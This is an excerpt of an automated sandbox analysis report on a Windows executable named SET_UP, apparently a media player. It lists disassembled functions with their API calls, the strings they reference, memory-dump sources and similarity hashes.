                                                                                                                                                                                                  • GlobalDeleteAtom.KERNEL32(?), ref: 004ACA42
                                                                                                                                                                                                  • GlobalDeleteAtom.KERNEL32(?), ref: 004ACA5D
                                                                                                                                                                                                  • GlobalDeleteAtom.KERNEL32(?), ref: 004ACA70
                                                                                                                                                                                                  • GlobalDeleteAtom.KERNEL32(?), ref: 004ACA83
                                                                                                                                                                                                  • GlobalDeleteAtom.KERNEL32(?), ref: 004ACA96
                                                                                                                                                                                                  • GlobalDeleteAtom.KERNEL32(?), ref: 004ACAA9
                                                                                                                                                                                                  • GlobalDeleteAtom.KERNEL32(?), ref: 004ACABC
                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(0050CEA0,?,004ABE5F), ref: 004ACACD
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AtomDeleteGlobal$CriticalSection$EnterLeave
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3843206905-0
                                                                                                                                                                                                  • Opcode ID: 53ac8c47efd1981150afe562d5c9a60db11ac1239146de7b33364a4cc96956ed
                                                                                                                                                                                                  • Instruction ID: bae0785ec3325775c506364e0daae8710526ff06e5b4e06b668758d4c965c0d2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 53ac8c47efd1981150afe562d5c9a60db11ac1239146de7b33364a4cc96956ed
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3711126A84061985D7576B54EC887AD3EBDB72B304F044616E500477F0D7F858CAEBA8
                                                                                                                                                                                                  Function 00411345 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 124windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0041134A
                                                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 00411393
                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 004113B8
                                                                                                                                                                                                  • CreateCompatibleBitmap.GDI32(?,?,?), ref: 004113E7
                                                                                                                                                                                                  • BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00CC0020), ref: 00411453
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CompatibleCreate$BitmapCopyH_prologRect
                                                                                                                                                                                                  • String ID: <L$VGL
                                                                                                                                                                                                  • API String ID: 3403178391-514139165
                                                                                                                                                                                                  • Opcode ID: ff8a69070323d55764cd9cb20b4288b8650e5e1f09be077be79c4f9b9e599b94
                                                                                                                                                                                                  • Instruction ID: 3e3b3e0d1e25e7034d1c0a4fc99d03218873bff8ba5cda314d9e6ddeb1b84aa6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff8a69070323d55764cd9cb20b4288b8650e5e1f09be077be79c4f9b9e599b94
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A7419272900209EFDF04DFE9C985EEEBBB4EF18304F14451AFA11A72A5D7789941CB64
                                                                                                                                                                                                  Function 004351AB Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000418,00000000,0000FFFF), ref: 004351EA
                                                                                                                                                                                                  • FindResourceW.KERNEL32(00000000,000000A2,PNG,00000004,00000000,?,00000003), ref: 0043520D
                                                                                                                                                                                                    • Part of subcall function 0043D300: SizeofResource.KERNEL32(?,?,00000000,?,?,74DE1F60,00435218,00000000,?,00000003), ref: 0043D328
                                                                                                                                                                                                    • Part of subcall function 0043D300: LoadResource.KERNEL32(?,?,?,?,74DE1F60,00435218,00000000,?,00000003), ref: 0043D332
                                                                                                                                                                                                    • Part of subcall function 0043D300: LockResource.KERNEL32(00000000,?,?,74DE1F60,00435218,00000000,?,00000003), ref: 0043D33D
                                                                                                                                                                                                  • FindResourceW.KERNEL32(00000000,000000A1,PNG,00000004,00000000,00000000,?,00000003), ref: 0043522A
                                                                                                                                                                                                    • Part of subcall function 004112F3: IsWindow.USER32(?), ref: 0041132A
                                                                                                                                                                                                    • Part of subcall function 004112F3: InvalidateRect.USER32(?,00000000,00000001,?,00435284,?), ref: 0041133B
                                                                                                                                                                                                    • Part of subcall function 004B0798: SendMessageW.USER32(?,00000432,00000000,?), ref: 004B07DB
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Resource$FindMessageSend$InvalidateLoadLockRectSizeofWindow
                                                                                                                                                                                                  • String ID: $Open Files$Open video/audio files$PNG
                                                                                                                                                                                                  • API String ID: 2188223922-3478177462
                                                                                                                                                                                                  • Opcode ID: e3b40afe1637b0f385a840ebe8790a87a3ddbeeee2eae5a52ef2b0c74ac21519
                                                                                                                                                                                                  • Instruction ID: 3a1d952d9f896af2287592f14e437821dbc1cd17136e019cab42f69a1694552b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e3b40afe1637b0f385a840ebe8790a87a3ddbeeee2eae5a52ef2b0c74ac21519
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A210870A40304BACB209BA68C41FEFF7BCAF95704F00056F7611A22D1D7B89504CA79
                                                                                                                                                                                                  Function 00430DF4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 75COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00430DF9
                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00430E09
                                                                                                                                                                                                  • GetPrivateProfileIntW.KERNEL32(Playlist,NumberOfEntries,000000FF,?), ref: 00430E23
                                                                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(Playlist,?,00508FBC,?,00000400,?), ref: 00430E7F
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: PrivateProfile$ExistsFileH_prologPathString
                                                                                                                                                                                                  • String ID: File%d$NumberOfEntries$Playlist
                                                                                                                                                                                                  • API String ID: 2426676720-2421212926
                                                                                                                                                                                                  • Opcode ID: 1716cd1f10a237ca6941d5bebb9dcdd419871e33a4b632f9f75e0c9706388f79
                                                                                                                                                                                                  • Instruction ID: 86d668bcf87f34a5bd15cd450bff3039f659b322d54ca170f9b196b8c692136c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1716cd1f10a237ca6941d5bebb9dcdd419871e33a4b632f9f75e0c9706388f79
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B21B631A00109ABCB00EFA1DC55EEF7B74BF04314F10463AF411E21E0DB789A08CB59
                                                                                                                                                                                                  Function 00439C94 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 52COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                  • String ID: animated-image$audio$caption$image$subtitle$video
                                                                                                                                                                                                  • API String ID: 3519838083-3068980797
                                                                                                                                                                                                  • Opcode ID: 6414545abf526197e18e1c2e4d337d83d2242684b4adacf41b65481a65910648
                                                                                                                                                                                                  • Instruction ID: 78d9934296f9b80b121ebc51943af85c43efef5598c77543162dbb6fbb86e003
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6414545abf526197e18e1c2e4d337d83d2242684b4adacf41b65481a65910648
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1015E3095015EA6CB10DF41CA56BFEB7A0AB08744F50641BB517661C1DBFC5E01D7AE
                                                                                                                                                                                                  Function 00435EC2 Relevance: 12.2, APIs: 8, Instructions: 200COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 00435EEC
                                                                                                                                                                                                  • __ftol.LIBCMT ref: 00436011
                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 004360F5
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CopyRectWindow__ftol
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3839655261-0
                                                                                                                                                                                                  • Opcode ID: 700972eaf8edf778206dba809705d6846c5fb10439c32cfdc58b0e5cf80b2d1a
                                                                                                                                                                                                  • Instruction ID: a450c9e9ba4d3b5d2a0ee8267f44a5a806dc86290e5b90dd084969aa71c09d7c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 700972eaf8edf778206dba809705d6846c5fb10439c32cfdc58b0e5cf80b2d1a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A713871E0060AEBCB05DFA9D985AEEBBF5FF48300F25852AE116B3250DB35A941CF54
                                                                                                                                                                                                  Function 0049DE58 Relevance: 12.2, APIs: 8, Instructions: 181COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000000,004DE718,00000001,004DE718,00000001,74DEE860,0050BD48,00000000), ref: 0049DE96
                                                                                                                                                                                                  • CompareStringW.KERNEL32(?,?,?,?,?,00000000,74DEE860,0050BD48,00000000), ref: 0049DEFC
                                                                                                                                                                                                  • CompareStringA.KERNEL32(00000000,00000000,0050924C,00000001,0050924C,00000001), ref: 0049DF12
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0050BD48,00000220,?,?,00000000,00000000,00000000,00000000,74DEE860,0050BD48,00000000), ref: 0049DF55
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000220,?,?,00000000,?,00000000,00000000), ref: 0049DFAF
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000220,?,00000000,00000000,00000000,00000000,00000000), ref: 0049DFC7
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000220,?,00000000,?,?,00000000,00000000), ref: 0049E01F
                                                                                                                                                                                                  • CompareStringA.KERNEL32(?,?,00000000,?,?,?,?,?,00000000,00000000), ref: 0049E03D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharCompareMultiStringWide
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1117519366-0
                                                                                                                                                                                                  • Opcode ID: 1723099261e2f855305d3ba94827713a4e96adcebfcd6913523f9c74664fdf7a
                                                                                                                                                                                                  • Instruction ID: fcabd9272890576457675657e90a87de67c046ac15c0adebc4b977e21cca898b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1723099261e2f855305d3ba94827713a4e96adcebfcd6913523f9c74664fdf7a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7519C71900249AFCF219F56CC86DEF7FB9FB49750F14452AF911A22A4C3398861DB68
                                                                                                                                                                                                  Function 00481780 Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 140stringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • lstrlenA.KERNEL32(?,FFFFFFFF,(:D,?,(:D,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 004817DA
                                                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0048182A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                                                  • String ID: (:D$A$C$L$Unrecognized equation type for pCAL chunk$p
                                                                                                                                                                                                  • API String ID: 1659193697-4162268544
                                                                                                                                                                                                  • Opcode ID: e6e0fa9d6e82c228bbfe70818ee2976e76d96bdd23f300df3ad03b17472a0d6b
                                                                                                                                                                                                  • Instruction ID: a9d95abe66abacb02c49bb5d8727a07796f5718b8f8fa9e1a8049b4b37e09456
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6e0fa9d6e82c228bbfe70818ee2976e76d96bdd23f300df3ad03b17472a0d6b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B41A471508345AFD300EB65C881D7FBBE9EFC5708F04492EF98587212E779E90A87A6
                                                                                                                                                                                                  Function 00481570 Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 139stringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 004811D0: lstrlenA.KERNEL32(?), ref: 004811F6
                                                                                                                                                                                                  • lstrlenA.KERNEL32(?,?,?,?,00000000,FFFFFFFF,(:D,?,?,004765B3,(:D,?,?,?,?,00000080), ref: 00481606
                                                                                                                                                                                                  • lstrlenA.KERNEL32(?,00000000,?,?,?,00000000,FFFFFFFF,(:D,?,?,004765B3,(:D,?,?,?,?), ref: 0048161E
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                                                  • String ID: (:D$Empty language field in iTXt chunk$T$X$i$t
                                                                                                                                                                                                  • API String ID: 1659193697-1893270040
                                                                                                                                                                                                  • Opcode ID: 3f693e8e12cbc06b59fe700401624cc80798cdf25a2b26da242cee3bd6c30eca
                                                                                                                                                                                                  • Instruction ID: 26db86621ff04119048766ae96a8f10222d902c9ed215997fb0102fbd2704650
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f693e8e12cbc06b59fe700401624cc80798cdf25a2b26da242cee3bd6c30eca
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2416E70509380AFD311EB15C885EAFBBEDEFD5308F44491EF58493212E779990587AB
                                                                                                                                                                                                  Function 004B42AC Relevance: 12.1, APIs: 8, Instructions: 120windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetClientRect.USER32(?,0000E900), ref: 004B42DF
                                                                                                                                                                                                  • BeginDeferWindowPos.USER32(00000008), ref: 004B42ED
                                                                                                                                                                                                  • GetTopWindow.USER32(?), ref: 004B42FF
                                                                                                                                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 004B430E
                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000361,00000000,00000000), ref: 004B4340
                                                                                                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 004B4349
                                                                                                                                                                                                  • CopyRect.USER32(?,0000E900), ref: 004B4365
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$Rect$BeginClientCopyCtrlDeferMessageSend
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3332788312-0
                                                                                                                                                                                                  • Opcode ID: 7aabe33229b05208a5d5bedc059be095f1a893cbbd27735e39cfec8304ff8d8d
                                                                                                                                                                                                  • Instruction ID: 03fbe17e5ea3d6c22ea244eb1fe9d170d32424f658381c01f5e673967bed88e9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7aabe33229b05208a5d5bedc059be095f1a893cbbd27735e39cfec8304ff8d8d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76414871A00209EFCF14DF99D9848EEB7F5FF88304B18416AF901A7251D7389E50DBA9
                                                                                                                                                                                                  Function 0040DEA5 Relevance: 12.1, APIs: 8, Instructions: 106windowthreadCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetSystemMenu.USER32(?,00000000,00000000,00000001,00000000), ref: 0040DEC9
                                                                                                                                                                                                  • DeleteMenu.USER32(?,0000F120,00000000,00000000), ref: 0040DEEB
                                                                                                                                                                                                  • DeleteMenu.USER32(?,0000F020,00000000), ref: 0040DEF9
                                                                                                                                                                                                  • DeleteMenu.USER32(?,0000F030,00000000), ref: 0040DF07
                                                                                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040DF5B
                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 0040DF67
                                                                                                                                                                                                  • PathMakePrettyW.SHLWAPI(?), ref: 0040DF8E
                                                                                                                                                                                                  • ResumeThread.KERNEL32(?,0040DFE4,?,00000000,00000004,00000000,00000000,?), ref: 0040DFCF
                                                                                                                                                                                                  Memory Dump Source
